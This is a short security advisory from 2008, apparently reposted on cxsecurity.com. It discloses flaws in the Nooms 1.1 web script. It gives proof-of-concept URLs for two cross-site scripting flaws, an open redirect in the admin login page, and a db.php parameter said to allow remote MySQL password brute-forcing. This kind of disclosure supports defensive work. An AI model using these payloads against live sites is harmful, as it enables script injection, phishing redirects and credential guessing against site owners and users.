Nooms 1.1

2008.09.11
Credit: irancrash
Risk: Medium
Local: No
Remote: Yes

---------------------------------------------------------------- Script : Nooms 1.1 Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access) Risk : Medium ---------------------------------------------------------------- Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : http://FEREIDANI.IR Team Website : http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Mysql Remote Brute Force Vulnerability : This is new type of the vulnerabilities . I can't public Exploit of this vulnerability , But with this vulnerability attacker can brute force root and other user password with php in remote mode . Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password] ---------------------------------------------------------------- Cross Site Scripting Vulnerabilities : Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script> Xss 2 : http://Example/search.php?q="<script>alert('xss')</script> ---------------------------------------------------------------- Redirect Vulnerability : Xss 1 : http://Example/admin/auth.php?g_site_url=[URL] ---------------------------------------------------------------- Tnx : God http://IRCRASH.COM http://FEREIDANI.IR ----------------------------------------------------------------

References:

http://www.securityfocus.com/archive/1/archive/1/496236/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top